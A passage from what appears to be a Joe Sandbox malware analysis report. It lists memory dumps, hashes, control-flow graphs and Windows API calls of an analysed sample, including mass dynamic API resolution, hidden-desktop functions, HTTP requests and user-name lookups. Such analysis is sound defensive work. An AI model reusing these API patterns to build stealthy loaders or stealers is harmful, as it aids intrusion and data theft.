                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: dfc6906caef0dd0d810db5ac0fdb13f68986f2acee7d1b2f058989ff5a213d32
                                • Instruction ID: 5ab50b8ea0c7f804ed7e7d1969b90ce9f0aee2f780b9400f57ef9986b772af33
                                • Opcode Fuzzy Hash: dfc6906caef0dd0d810db5ac0fdb13f68986f2acee7d1b2f058989ff5a213d32
                                • Instruction Fuzzy Hash: F5817C71A41216ABDB20EFA4DC49FEE77BABF45710F044169F949E7280DB70AD048F94
                                Function 006A4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2850 6a4a60-6a4afc RtlAllocateHeap 2867 6a4b7a-6a4bbe VirtualProtect 2850->2867 2868 6a4afe-6a4b03 2850->2868 2869 6a4b06-6a4b78 2868->2869 2869->2867
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A4AA2
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 006A4BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 886002cf45439fc0dc1f606bb9281369353079163417df95a7bc6155611c5b81
                                • Instruction ID: 2bd61410f68bce0149db2310edc41c62c5f18423a2449dabae11378fd2474d71
                                • Opcode Fuzzy Hash: 886002cf45439fc0dc1f606bb9281369353079163417df95a7bc6155611c5b81
                                • Instruction Fuzzy Hash: 3F31B319F82219678620EBEB4CA7B5F6F56FB85760B03406765A8DB381CDB15D00CAA2
                                Function 006C2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006C2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 006C2A8A
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 9abe1d2a9ab859855c4e26fd9ddbacbdbe6346727703949b73b01ee38ea3d3c0
                                • Instruction ID: cc4127643988ae0208bf932c56679022007ec9130b79c47b9fbeea378a7a1902
                                • Opcode Fuzzy Hash: 9abe1d2a9ab859855c4e26fd9ddbacbdbe6346727703949b73b01ee38ea3d3c0
                                • Instruction Fuzzy Hash: 62F0B4B1A41648EBC700DF88DD49F9EBBBCF704B21F00022AF915E3280D774190486A1
                                Function 006C66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 6c66e0-6c66e7 634 6c66ed-6c6af9 GetProcAddress * 43 633->634 635 6c6afe-6c6b92 LoadLibraryA * 8 633->635 634->635 636 6c6c08-6c6c0f 635->636 637 6c6b94-6c6c03 GetProcAddress * 5 635->637 638 6c6c15-6c6ccd GetProcAddress * 8 636->638 639 6c6cd2-6c6cd9 636->639 637->636 638->639 640 6c6d4f-6c6d56 639->640 641 6c6cdb-6c6d4a GetProcAddress * 5 639->641 642 6c6d5c-6c6de4 GetProcAddress * 6 640->642 643 6c6de9-6c6df0 640->643 641->640 642->643 644 6c6df6-6c6f0b GetProcAddress * 12 643->644 645 6c6f10-6c6f17 643->645 644->645 646 6c6f8d-6c6f94 645->646 647 6c6f19-6c6f88 GetProcAddress * 5 645->647 648 6c6f96-6c6fbc GetProcAddress * 2 646->648 649 6c6fc1-6c6fc8 646->649 647->646 648->649 650 6c6fca-6c6ff0 GetProcAddress * 2 649->650 651 6c6ff5-6c6ffc 649->651 650->651 652 6c70ed-6c70f4 651->652 653 6c7002-6c70e8 GetProcAddress * 10 651->653 654 6c70f6-6c714d GetProcAddress * 4 652->654 655 6c7152-6c7159 652->655 653->652 654->655 656 6c716e-6c7175 655->656 657 6c715b-6c7169 GetProcAddress 655->657 658 6c7177-6c71ce GetProcAddress * 4 656->658 659 6c71d3 656->659 657->656 658->659
                                APIs
                                • GetProcAddress.KERNEL32(77190000,01326678), ref: 006C66F5
                                • GetProcAddress.KERNEL32(77190000,01326718), ref: 006C670D
                                • GetProcAddress.KERNEL32(77190000,013396B8), ref: 006C6726
                                • GetProcAddress.KERNEL32(77190000,01339748), ref: 006C673E
                                • GetProcAddress.KERNEL32(77190000,01339760), ref: 006C6756
                                • GetProcAddress.KERNEL32(77190000,0133D168), ref: 006C676F
                                • GetProcAddress.KERNEL32(77190000,0132A710), ref: 006C6787
                                • GetProcAddress.KERNEL32(77190000,0133D360), ref: 006C679F
                                • GetProcAddress.KERNEL32(77190000,0133D108), ref: 006C67B8
                                • GetProcAddress.KERNEL32(77190000,0133D330), ref: 006C67D0
                                • GetProcAddress.KERNEL32(77190000,0133D120), ref: 006C67E8
                                • GetProcAddress.KERNEL32(77190000,01326698), ref: 006C6801
                                • GetProcAddress.KERNEL32(77190000,01326738), ref: 006C6819
                                • GetProcAddress.KERNEL32(77190000,01326578), ref: 006C6831
                                • GetProcAddress.KERNEL32(77190000,013266B8), ref: 006C684A
                                • GetProcAddress.KERNEL32(77190000,0133D138), ref: 006C6862
                                • GetProcAddress.KERNEL32(77190000,0133D348), ref: 006C687A
                                • GetProcAddress.KERNEL32(77190000,0132A8F0), ref: 006C6893
                                • GetProcAddress.KERNEL32(77190000,01326778), ref: 006C68AB
                                • GetProcAddress.KERNEL32(77190000,0133D0F0), ref: 006C68C3
                                • GetProcAddress.KERNEL32(77190000,0133D318), ref: 006C68DC
                                • GetProcAddress.KERNEL32(77190000,0133D150), ref: 006C68F4
                                • GetProcAddress.KERNEL32(77190000,0133D180), ref: 006C690C
                                • GetProcAddress.KERNEL32(77190000,013266D8), ref: 006C6925
                                • GetProcAddress.KERNEL32(77190000,0133D2E8), ref: 006C693D
                                • GetProcAddress.KERNEL32(77190000,0133D2B8), ref: 006C6955
                                • GetProcAddress.KERNEL32(77190000,0133D210), ref: 006C696E
                                • GetProcAddress.KERNEL32(77190000,0133D198), ref: 006C6986
                                • GetProcAddress.KERNEL32(77190000,0133D078), ref: 006C699E
                                • GetProcAddress.KERNEL32(77190000,0133D240), ref: 006C69B7
                                • GetProcAddress.KERNEL32(77190000,0133D1B0), ref: 006C69CF
                                • GetProcAddress.KERNEL32(77190000,0133D258), ref: 006C69E7
                                • GetProcAddress.KERNEL32(77190000,0133D1C8), ref: 006C6A00
                                • GetProcAddress.KERNEL32(77190000,0132FE90), ref: 006C6A18
                                • GetProcAddress.KERNEL32(77190000,0133D1E0), ref: 006C6A30
                                • GetProcAddress.KERNEL32(77190000,0133D2D0), ref: 006C6A49
                                • GetProcAddress.KERNEL32(77190000,013266F8), ref: 006C6A61
                                • GetProcAddress.KERNEL32(77190000,0133D1F8), ref: 006C6A79
                                • GetProcAddress.KERNEL32(77190000,01326758), ref: 006C6A92
                                • GetProcAddress.KERNEL32(77190000,0133D0D8), ref: 006C6AAA
                                • GetProcAddress.KERNEL32(77190000,0133D270), ref: 006C6AC2
                                • GetProcAddress.KERNEL32(77190000,013267F8), ref: 006C6ADB
                                • GetProcAddress.KERNEL32(77190000,01326818), ref: 006C6AF3
                                • LoadLibraryA.KERNEL32(0133D228,006C051F), ref: 006C6B05
                                • LoadLibraryA.KERNEL32(0133D288), ref: 006C6B16
                                • LoadLibraryA.KERNEL32(0133D2A0), ref: 006C6B28
                                • LoadLibraryA.KERNEL32(0133D300), ref: 006C6B3A
                                • LoadLibraryA.KERNEL32(0133D090), ref: 006C6B4B
                                • LoadLibraryA.KERNEL32(0133D0A8), ref: 006C6B5D
                                • LoadLibraryA.KERNEL32(0133D0C0), ref: 006C6B6F
                                • LoadLibraryA.KERNEL32(0133D4B0), ref: 006C6B80
                                • GetProcAddress.KERNEL32(77040000,013263D8), ref: 006C6B9C
                                • GetProcAddress.KERNEL32(77040000,0133D3D8), ref: 006C6BB4
                                • GetProcAddress.KERNEL32(77040000,01339148), ref: 006C6BCD
                                • GetProcAddress.KERNEL32(77040000,0133D600), ref: 006C6BE5
                                • GetProcAddress.KERNEL32(77040000,013262F8), ref: 006C6BFD
                                • GetProcAddress.KERNEL32(74390000,0132A7D8), ref: 006C6C1D
                                • GetProcAddress.KERNEL32(74390000,01326318), ref: 006C6C35
                                • GetProcAddress.KERNEL32(74390000,0132A760), ref: 006C6C4E
                                • GetProcAddress.KERNEL32(74390000,0133D540), ref: 006C6C66
                                • GetProcAddress.KERNEL32(74390000,0133D648), ref: 006C6C7E
                                • GetProcAddress.KERNEL32(74390000,013262B8), ref: 006C6C97
                                • GetProcAddress.KERNEL32(74390000,01326418), ref: 006C6CAF
                                • GetProcAddress.KERNEL32(74390000,0133D660), ref: 006C6CC7
                                • GetProcAddress.KERNEL32(768D0000,01326338), ref: 006C6CE3
                                • GetProcAddress.KERNEL32(768D0000,013264F8), ref: 006C6CFB
                                • GetProcAddress.KERNEL32(768D0000,0133D378), ref: 006C6D14
                                • GetProcAddress.KERNEL32(768D0000,0133D5E8), ref: 006C6D2C
                                • GetProcAddress.KERNEL32(768D0000,013264D8), ref: 006C6D44
                                • GetProcAddress.KERNEL32(75790000,0132A4B8), ref: 006C6D64
                                • GetProcAddress.KERNEL32(75790000,0132A490), ref: 006C6D7C
                                • GetProcAddress.KERNEL32(75790000,0133D390), ref: 006C6D95
                                • GetProcAddress.KERNEL32(75790000,01326218), ref: 006C6DAD
                                • GetProcAddress.KERNEL32(75790000,01326518), ref: 006C6DC5
                                • GetProcAddress.KERNEL32(75790000,0132A878), ref: 006C6DDE
                                • GetProcAddress.KERNEL32(75A10000,0133D5B8), ref: 006C6DFE
                                • GetProcAddress.KERNEL32(75A10000,01326238), ref: 006C6E16
                                • GetProcAddress.KERNEL32(75A10000,01339108), ref: 006C6E2F
                                • GetProcAddress.KERNEL32(75A10000,0133D3A8), ref: 006C6E47
                                • GetProcAddress.KERNEL32(75A10000,0133D3C0), ref: 006C6E5F
                                • GetProcAddress.KERNEL32(75A10000,01326138), ref: 006C6E78
                                • GetProcAddress.KERNEL32(75A10000,01326258), ref: 006C6E90
                                • GetProcAddress.KERNEL32(75A10000,0133D558), ref: 006C6EA8
                                • GetProcAddress.KERNEL32(75A10000,0133D618), ref: 006C6EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 006C6ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 006C6EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 006C6F05
                                • GetProcAddress.KERNEL32(76850000,013261D8), ref: 006C6F21
                                • GetProcAddress.KERNEL32(76850000,0133D4C8), ref: 006C6F39
                                • GetProcAddress.KERNEL32(76850000,0133D3F0), ref: 006C6F52
                                • GetProcAddress.KERNEL32(76850000,0133D468), ref: 006C6F6A
                                • GetProcAddress.KERNEL32(76850000,0133D5A0), ref: 006C6F82
                                • GetProcAddress.KERNEL32(75690000,013263F8), ref: 006C6F9E
                                • GetProcAddress.KERNEL32(75690000,01326358), ref: 006C6FB6
                                • GetProcAddress.KERNEL32(769C0000,01326158), ref: 006C6FD2
                                • GetProcAddress.KERNEL32(769C0000,0133D570), ref: 006C6FEA
                                • GetProcAddress.KERNEL32(6F8C0000,01326298), ref: 006C700A
                                • GetProcAddress.KERNEL32(6F8C0000,013261F8), ref: 006C7022
                                • GetProcAddress.KERNEL32(6F8C0000,01326198), ref: 006C703B
                                • GetProcAddress.KERNEL32(6F8C0000,0133D528), ref: 006C7053
                                • GetProcAddress.KERNEL32(6F8C0000,013264B8), ref: 006C706B
                                • GetProcAddress.KERNEL32(6F8C0000,013262D8), ref: 006C7084
                                • GetProcAddress.KERNEL32(6F8C0000,01326178), ref: 006C709C
                                • GetProcAddress.KERNEL32(6F8C0000,01326378), ref: 006C70B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 006C70CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 006C70E2
                                • GetProcAddress.KERNEL32(75D90000,0133D408), ref: 006C70FE
                                • GetProcAddress.KERNEL32(75D90000,01339298), ref: 006C7116
                                • GetProcAddress.KERNEL32(75D90000,0133D438), ref: 006C712F
                                • GetProcAddress.KERNEL32(75D90000,0133D588), ref: 006C7147
                                • GetProcAddress.KERNEL32(76470000,01326278), ref: 006C7163
                                • GetProcAddress.KERNEL32(6D780000,0133D4E0), ref: 006C717F
                                • GetProcAddress.KERNEL32(6D780000,01326398), ref: 006C7197
                                • GetProcAddress.KERNEL32(6D780000,0133D5D0), ref: 006C71B0
                                • GetProcAddress.KERNEL32(6D780000,0133D420), ref: 006C71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: f80a89b2101588bbf1b01ab0b9b2a090810878484e3e6c3364a5def1b19c205f
                                • Instruction ID: bbe7dea2d6d5606155cd852ceb382259fd70d9cb237ab2f28eec9b9ee49fedd4
                                • Opcode Fuzzy Hash: f80a89b2101588bbf1b01ab0b9b2a090810878484e3e6c3364a5def1b19c205f
                                • Instruction Fuzzy Hash: 5A620EB5613A00EFD754DF69FC98A2637BAF7886413148B1BE995D3364EA34AC00DF60
                                Function 006BF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(006CCFEC), ref: 006BF1D5
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF1F1
                                • lstrlen.KERNEL32(006CCFEC), ref: 006BF1FC
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF215
                                • lstrlen.KERNEL32(006CCFEC), ref: 006BF220
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF239
                                • lstrcpy.KERNEL32(00000000,006D4FA0), ref: 006BF25E
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF28C
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF2C0
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF2F0
                                • lstrlen.KERNEL32(01326538), ref: 006BF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: d4c733791a8bcebfed255d871c6d48800cccf7fd560fe49d5d38ea4a57111797
                                • Instruction ID: 2ef702568a331b2bb0f36bc57dcd4a2e3d66778e3fbf3a28643d89573fd512c2
                                • Opcode Fuzzy Hash: d4c733791a8bcebfed255d871c6d48800cccf7fd560fe49d5d38ea4a57111797
                                • Instruction Fuzzy Hash: D4A22DB09012169FCB60EF69D854A9AB7F6BF45310B18817EE849DB361EB35DC81CB50
                                Function 006BFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0013
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C00BD
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C00E1
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C00EC
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0110
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C011B
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C013F
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C015A
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0189
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C0194
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C01C3
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C01CE
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0206
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C0250
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C059B
                                • lstrlen.KERNEL32(01326558), ref: 006C05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 006C05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C060E
                                • lstrlen.KERNEL32(0133EE30), ref: 006C0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C064C
                                • lstrcat.KERNEL32(00000000,?), ref: 006C0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C0681
                                • lstrlen.KERNEL32(013265B8), ref: 006C0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 006C06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C0706
                                • lstrcpy.KERNEL32(00000000,01339128), ref: 006C074B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C077F
                                • lstrcpy.KERNEL32(00000000,0133EBD8), ref: 006C07E7
                                • lstrcpy.KERNEL32(00000000,013393B8), ref: 006C0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 006C08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C0928
                                • lstrcpy.KERNEL32(00000000,01339358), ref: 006C09F8
                                  • Part of subcall function 006A24E0: lstrcpy.KERNEL32(00000000,?), ref: 006A2528
                                  • Part of subcall function 006A24E0: lstrcpy.KERNEL32(00000000,?), ref: 006A254E
                                  • Part of subcall function 006A24E0: lstrcpy.KERNEL32(00000000,?), ref: 006A2577
                                • lstrcpy.KERNEL32(00000000,01339378), ref: 006C0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C0B81
                                • lstrcpy.KERNEL32(00000000,01339378), ref: 006C0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
